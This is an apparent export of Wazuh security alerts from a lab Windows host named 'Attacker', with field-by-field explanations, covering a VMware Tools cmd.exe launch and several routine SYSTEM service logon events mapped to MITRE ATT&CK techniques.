When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533920.285870
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:53.8873601Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212029
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:53.853 ProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ProcessId: 4044 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:53.853
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e25-6801-d807-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:01.954+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:01.954+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533921.291489
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:35.6047549Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43630
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:02.120+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.120+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.298825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:41.3826372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43632
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:02.389+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.389+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.306163
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:45.2693434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43634
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
